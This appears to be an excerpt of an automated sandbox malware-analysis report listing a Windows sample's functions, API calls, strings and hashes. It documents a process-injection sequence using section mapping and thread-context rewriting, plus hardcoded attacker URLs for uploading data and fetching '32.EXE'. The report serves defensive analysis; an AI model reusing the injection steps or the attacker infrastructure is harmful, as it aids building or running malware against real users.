                                                                            Function 007C6090 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _strlen.LIBCMT ref: 007C60F7
                                                                            • X64Call.FILE(B4411B10,00007FFD,00000004,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 007C6145
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Call_strlen
                                                                            • String ID:
                                                                            • API String ID: 1092177880-0
                                                                            • Opcode ID: 01dc978f1e3e38fd751e5e924db35ea6e512489d3b2d7cd39cdba1accd0598df
                                                                            • Instruction ID: c529db643c0741e3cf7fbb0fa0f47787774899b983b7637d2c25ed0e0a6631be
                                                                            • Opcode Fuzzy Hash: 01dc978f1e3e38fd751e5e924db35ea6e512489d3b2d7cd39cdba1accd0598df
                                                                            • Instruction Fuzzy Hash: DC2100B4914209DFDB14CFA8EC46BAFB7B5FF88314F00452DEA08A7250E7749694CB95
                                                                            Function 007C58D5 Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThreadUser
                                                                            • String ID:
                                                                            • API String ID: 1531140918-0
                                                                            • Opcode ID: 9d825d32468024121c3756d526faa31a86c33974238a552c6b200037977dcc1c
                                                                            • Instruction ID: 2fddfab0bd4b1273ea4df85b1208519c4980d36b20c2a4958c80ab5e0a5b095a
                                                                            • Opcode Fuzzy Hash: 9d825d32468024121c3756d526faa31a86c33974238a552c6b200037977dcc1c
                                                                            • Instruction Fuzzy Hash: D5F04931918D1DEF8F15AAA8D804EADBBB1FB68320F10020DE405E3044DA32F4909B81

                                                                            Non-executed Functions

                                                                            Function 007D44B0 Relevance: 145.8, APIs: 62, Strings: 21, Instructions: 500nativestringlibraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000044,00000000), ref: 007D450D
                                                                            • GetModuleHandleW.KERNEL32(NTDLL.DLL), ref: 007D4525
                                                                            • GetProcAddress.KERNEL32(?,NtCreateSection), ref: 007D4537
                                                                            • GetProcAddress.KERNEL32(?,NtMapViewOfSection), ref: 007D454C
                                                                            • GetProcAddress.KERNEL32(?,RtlCreateUserThread), ref: 007D4561
                                                                            • GetProcAddress.KERNEL32(?,NtUnmapViewOfSection), ref: 007D4573
                                                                            • GetProcAddress.KERNEL32(?,NtClose), ref: 007D4585
                                                                            • GetCurrentProcess.KERNEL32 ref: 007D4591
                                                                            • NtCreateSection.NTDLL(00000000,00000006,00000000,0000091C,00000004,08000000,00000000), ref: 007D463B
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,0000091C,00000002,00000000,00000004), ref: 007D4682
                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 007D4690
                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,0000091C,00000002,00000000,00000004), ref: 007D46D8
                                                                            • NtCreateSection.NTDLL(00000000,0000000E,00000000,?,00000040,08000000,00000000), ref: 007D473B
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 007D4784
                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 007D4792
                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 007D47DA
                                                                            • _memmove.LIBCMT ref: 007D4806
                                                                            • LoadLibraryW.KERNEL32(KERNEL32.DLL), ref: 007D481F
                                                                            • GetProcAddress.KERNEL32(?,LoadLibraryW), ref: 007D4837
                                                                            • GetProcAddress.KERNEL32(?,GetProcAddress), ref: 007D4851
                                                                            • lstrcpyW.KERNEL32(?,KERNEL32.DLL), ref: 007D486F
                                                                            • lstrcpyW.KERNEL32(?,USER32.DLL), ref: 007D4886
                                                                            • lstrcpyA.KERNEL32(?,Sleep), ref: 007D489E
                                                                            • lstrcpyA.KERNEL32(?,LoadLibraryA), ref: 007D48B6
                                                                            • lstrcpyA.KERNEL32(?,LocalAlloc), ref: 007D48CD
                                                                            • lstrcpyA.KERNEL32(?,VirtualAlloc), ref: 007D48E5
                                                                            • lstrcpyA.KERNEL32(?,LocalFree), ref: 007D48FD
                                                                            • lstrcpyA.KERNEL32(?,CloseHandle), ref: 007D4914
                                                                            • lstrcpyA.KERNEL32(?,VirtualFree), ref: 007D492C
                                                                            • lstrcpyA.KERNEL32(?,MessageBoxW), ref: 007D4944
                                                                            • lstrcpyA.KERNEL32(?,VirtualProtect), ref: 007D495B
                                                                            • NtCreateSection.NTDLL(00000000,00000006,00000000,?,00000004,08000000,00000000), ref: 007D4997
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 007D49DD
                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 007D49EB
                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 007D4A33
                                                                            • _memmove.LIBCMT ref: 007D4A5B
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,007C55B9), ref: 007D4A98
                                                                            • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007D4AE0
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000BB8), ref: 007D4B1F
                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 007D4B46
                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 007D4B57
                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 007D4B68
                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D4B79
                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D4B8A
                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D4B9B
                                                                            • NtClose.NTDLL(00000000), ref: 007D4BA8
                                                                            • NtClose.NTDLL(00000000), ref: 007D4BB5
                                                                            • NtClose.NTDLL(00000000), ref: 007D4BC2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D4BCF
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 007D4BE7
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D4BF1
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D4BFB
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D4C1D
                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D4C2E
                                                                            • NtClose.NTDLL(00000000), ref: 007D4C3B
                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D4C4C
                                                                            • NtClose.NTDLL(00000000), ref: 007D4C59
                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D4C6A
                                                                            • NtClose.NTDLL(00000000), ref: 007D4C77
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 007D4C89
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D4C93
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D4C9D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Section$View$Close$lstrcpy$Unmap$AddressHandleProcProcess$Create$Current$Terminate_memmove$EventLibraryLoadModuleObjectSingleThreadUserWait
                                                                            • String ID: CloseHandle$D$GetProcAddress$KERNEL32.DLL$KERNEL32.DLL$LoadLibraryA$LoadLibraryW$LocalAlloc$LocalFree$MessageBoxW$NTDLL.DLL$NtClose$NtCreateSection$NtMapViewOfSection$NtUnmapViewOfSection$RtlCreateUserThread$Sleep$USER32.DLL$VirtualAlloc$VirtualFree$VirtualProtect
                                                                            • API String ID: 4191060109-4063295011
                                                                            • Opcode ID: 3768ef0ae668a262724fe0abd8158c639e47adbe88997c7f9ac508a570efad88
                                                                            • Instruction ID: 1d7ec51fe204189e46106ddcaa879b232731e7cf41331e0cf89c113d39142904
                                                                            • Opcode Fuzzy Hash: 3768ef0ae668a262724fe0abd8158c639e47adbe88997c7f9ac508a570efad88
                                                                            • Instruction Fuzzy Hash: 51222FB1A00218EFEB24CFA4CD49FAEB775BB48701F108599F609B7291CB785985CF64
                                                                            Function 007E1030 Relevance: 89.6, APIs: 48, Strings: 3, Instructions: 351synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenEventW.KERNEL32(00100000,00000000,{54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}), ref: 007E1042
                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{C3397568-8840-4085-8F6E-BC07C085BB3B}), ref: 007E1071
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007E10EA
                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 007E1149
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1534
                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 007E154E
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1558
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1568
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1572
                                                                            Strings
                                                                            • {C3397568-8840-4085-8F6E-BC07C085BB3B}, xrefs: 007E1065
                                                                            • {50EF1399-6492-458E-896D-12BB129EB697}, xrefs: 007E10A1
                                                                            • {54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}, xrefs: 007E1036
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventMutexOpen$CreateObjectReleaseSingleWait
                                                                            • String ID: {50EF1399-6492-458E-896D-12BB129EB697}${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}${C3397568-8840-4085-8F6E-BC07C085BB3B}
                                                                            • API String ID: 385723476-3953213537
                                                                            • Opcode ID: 0f84d293956773d8d954d3d3db6e53e187dfff79fc111917cfca05274186d10d
                                                                            • Instruction ID: 24fa1740e5bc870470df7d9f8f8d5673f7989e1c6e9b949f8340baf6c9458a34
                                                                            • Opcode Fuzzy Hash: 0f84d293956773d8d954d3d3db6e53e187dfff79fc111917cfca05274186d10d
                                                                            • Instruction Fuzzy Hash: 11E16D71906344EBDB24DFA5EC4EBAD77B1BB48701F608518F202A62E1CBBC8985CF55
                                                                            Function 007C5140 Relevance: 75.6, APIs: 33, Strings: 10, Instructions: 352stringmemoryencryptionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000B3C), ref: 007C5150
                                                                            • lstrcpyW.KERNEL32(00000000,{08A9BF59-0E77-41C8-B553-94F53303F0D5}), ref: 007C5179
                                                                            • lstrcpyW.KERNEL32(-0000009C,{C3397568-8840-4085-8F6E-BC07C085BB3B}), ref: 007C5191
                                                                            • lstrcpyW.KERNEL32(-000000EA,{F8334C8B-EA9E-45F9-ADFE-BAE309D22900}), ref: 007C51A9
                                                                            • lstrcpyW.KERNEL32(-00000138,Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0), ref: 007C51BF
                                                                            • lstrcpyW.KERNEL32(-000005EA,00836BDC), ref: 007C51D7
                                                                            • lstrcpyW.KERNEL32(-000006B2,https://woo097878781.win/upload.php), ref: 007C51EF
                                                                            • lstrcpyW.KERNEL32(-0000090A,{77F3A004-6E1A-45B6-91BA-6F11612691D9}), ref: 007C5205
                                                                            • _memset.LIBCMT ref: 007C5302
                                                                            • CryptBinaryToStringW.CRYPT32(00000000,00000010,4000000C,00000000,00000000), ref: 007C5328
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56DD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56F2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5702
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5712
                                                                            Strings
                                                                            • {F8334C8B-EA9E-45F9-ADFE-BAE309D22900}, xrefs: 007C5197, 007C558D
                                                                            • {C3397568-8840-4085-8F6E-BC07C085BB3B}, xrefs: 007C517F
                                                                            • {77F3A004-6E1A-45B6-91BA-6F11612691D9}, xrefs: 007C51F5
                                                                            • HWID_%s, xrefs: 007C5388
                                                                            • %s %s, xrefs: 007C5574
                                                                            • https://woo097878781.win/32.EXE, xrefs: 007C543B
                                                                            • https://woo097878781.win/upload.php, xrefs: 007C51DD
                                                                            • {08A9BF59-0E77-41C8-B553-94F53303F0D5}, xrefs: 007C516E
                                                                            • {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}, xrefs: 007C5568
                                                                            • Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0, xrefs: 007C51AF, 007C542A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcpy$Local$CloseFreeHandle$AllocBinaryCryptString_memset
                                                                            • String ID: %s %s$HWID_%s$Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0$https://woo097878781.win/32.EXE$https://woo097878781.win/upload.php${08A9BF59-0E77-41C8-B553-94F53303F0D5}${77F3A004-6E1A-45B6-91BA-6F11612691D9}${C3397568-8840-4085-8F6E-BC07C085BB3B}${D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}${F8334C8B-EA9E-45F9-ADFE-BAE309D22900}
                                                                            • API String ID: 2754469768-1176139285
                                                                            • Opcode ID: b55f630825257e75e7a204590363fb62463fa9adc70b8e22002f04715993971c
                                                                            • Instruction ID: bd3b42c09b9e599623c4ac5519c510c0ae81b31aaacbd52f50dcfb030aa1bc0f
                                                                            • Opcode Fuzzy Hash: b55f630825257e75e7a204590363fb62463fa9adc70b8e22002f04715993971c
                                                                            • Instruction Fuzzy Hash: 42E1B371A00314DBD714CB64EC4AFAAB7B5FB88704F00896DE505B72D1EBB9AA85CF50
                                                                            Function 007D6D30 Relevance: 68.8, APIs: 38, Strings: 1, Instructions: 529threadsynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6DC7
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6DF9
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007D6E17
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000E020,-00839F18,00000004,00000000), ref: 007D6E4C
                                                                            • ResumeThread.KERNEL32(00000000), ref: 007D6E8C
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6EA5
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6EAF
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007D6EF9
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6F31
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6F63
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007D6F81
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000E020,-00839F18,00000004,00000000), ref: 007D6FB5
                                                                            • ResumeThread.KERNEL32(00000000), ref: 007D6FF5
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007D70B8
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007D716A
                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 007D7187
                                                                            • closesocket.WS2_32(?), ref: 007D7193
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$CreateThread$EventResumesetsockopt$InfoLocaleObjectSingleWait___crtclosesocket
                                                                            • String ID: d
                                                                            • API String ID: 404341171-2564639436
                                                                            • Opcode ID: 1b315e934bc00862ebf4701fbdcc7c8b646729b095109e8f2c8135c2168d348d
                                                                            • Instruction ID: bd8924390ee5054b4a3c6cfae1247662f2bf94b8b77b7d67ae53a9d68c3d16b6
                                                                            • Opcode Fuzzy Hash: 1b315e934bc00862ebf4701fbdcc7c8b646729b095109e8f2c8135c2168d348d
                                                                            • Instruction Fuzzy Hash: 4C327D75A04208DFDB18CF94C889BADBBB6FB98304F24C51AE516AF3D1D7789842CB54
                                                                            Function 007E1580 Relevance: 60.5, APIs: 40, Instructions: 459synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007E15F6
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007E163E
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007E1678
                                                                            • WaitForMultipleObjects.KERNEL32(00000006,?,00000000,000000FF), ref: 007E18CE
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007E1BD7
                                                                            • shutdown.WS2_32(00000000,00000002), ref: 007E1D0F
                                                                            • closesocket.WS2_32(00000000), ref: 007E1D23
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1D52
                                                                            • shutdown.WS2_32(00000000,00000002), ref: 007E1D7D
                                                                            • closesocket.WS2_32(00000000), ref: 007E1D8A
                                                                            • LocalFree.KERNEL32(?), ref: 007E1D9E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Wait$ObjectSingle$closesocketshutdown$CloseFreeHandleLocalMultipleObjects
                                                                            • String ID:
                                                                            • API String ID: 3117981272-0
                                                                            • Opcode ID: b6a48f02110c545c619ccd4b0f7c801854f2637162ead2796ccd5e170d3a5044
                                                                            • Instruction ID: e9e03974da9d0f38d9d8f4ec477612c89888e513d35a724e038c72d03e0c6b5e
                                                                            • Opcode Fuzzy Hash: b6a48f02110c545c619ccd4b0f7c801854f2637162ead2796ccd5e170d3a5044
                                                                            • Instruction Fuzzy Hash: 07225B74A01318DFDB24CF94ED89BED7775BB88304F508498E649A7290D7B8AE84CF61
                                                                            Function 007CA1B0 Relevance: 54.5, APIs: 30, Strings: 1, Instructions: 283nativethreadinjectionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 007CA1B9
                                                                            • _memset.LIBCMT ref: 007CA1CA
                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,?,00000044,007C2000), ref: 007CA21B
                                                                            • NtCreateSection.NTDLL(00000000,00000006,00000000,?,00000004,08000000,00000000), ref: 007CA251
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 007CA285
                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 007CA290
                                                                            • _memmove.LIBCMT ref: 007CA2AF
                                                                            • NtMapViewOfSection.NTDLL(00000000,007C2000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 007CA2DA
                                                                            • NtCreateSection.NTDLL(00000000,0000000E,00000000,?,00000040,08000000,00000000), ref: 007CA320
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 007CA360
                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 007CA36E
                                                                            • _memmove.LIBCMT ref: 007CA390
                                                                            • NtMapViewOfSection.NTDLL(00000000,007C2000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 007CA3C7
                                                                            • _memset.LIBCMT ref: 007CA3E8
                                                                            • GetThreadContext.KERNEL32(?,00010007), ref: 007CA405
                                                                            • WriteProcessMemory.KERNEL32(007C2000,?,?,00000004,?), ref: 007CA447
                                                                            • SetThreadContext.KERNEL32(?,00010007), ref: 007CA461
                                                                            • ResumeThread.KERNEL32(?), ref: 007CA470
                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 007CA486
                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 007CA494
                                                                            • NtClose.NTDLL(00000000), ref: 007CA49E
                                                                            • NtClose.NTDLL(00000000), ref: 007CA4AB
                                                                            • NtUnmapViewOfSection.NTDLL(007C2000,00000000), ref: 007CA4E6
                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 007CA4F7
                                                                            • NtClose.NTDLL(00000000), ref: 007CA504
                                                                            • NtUnmapViewOfSection.NTDLL(007C2000,00000000), ref: 007CA512
                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 007CA520
                                                                            • NtClose.NTDLL(00000000), ref: 007CA52A
                                                                            • CloseHandle.KERNEL32(007C2000), ref: 007CA534
                                                                            • CloseHandle.KERNEL32(?), ref: 007CA53E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
